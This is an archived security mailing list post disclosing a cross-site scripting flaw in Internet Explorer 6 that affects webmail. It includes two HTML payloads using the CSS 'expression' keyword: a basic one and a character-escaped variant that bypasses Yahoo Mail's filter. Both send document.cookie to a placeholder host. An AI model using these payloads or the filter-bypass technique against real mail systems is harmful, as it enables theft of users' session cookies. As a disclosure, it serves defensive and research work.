lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: j at pureftpd.org (Jedi/Sector One)
Subject: Webmails (including Yahoo) + IE 6 = XSS

  Internet Explorer has an useless feature that allows evaluation of
Javascript expressions in style sheets through the "expression" keyword.

  It allows execution of arbitrary javascript as soon as an HTML message is
read in older versions of Outlook and in most webmail systems filtering
<script> tags :

<html>
<body>
<style type="text/css">
h1 {
  height:expression(alert(42));
  background-image:expression('url(http://example.org/'+document.cookie+')');
}
</style>
<h1>...</h1>
</body>
</html>

  Yahoo! mail has a filter against this, that replaces "expression" with
"_expression".

  Unfortunately, this filter is easy to bypass using escaped characters that
are valid CSS and that are properly handled by IE 6.

<html>
<body>
<style type="text/css">
h1 {
  he\ight:e\xpression(alert(42));
  bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+')');
}
</style>
<h1>...</h1>
</body>
</html>

  Workaround until all existing webmail software is fixed (...) : disable
Javascript and/or use any other web browser that focuses on W3C compliance
instead of implementing insecure bloat.

-- 
 __  /*-      Frank DENIS (Jedi/Sector One) <j@...Networks.Com>     -*\  __
 \ '/    <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ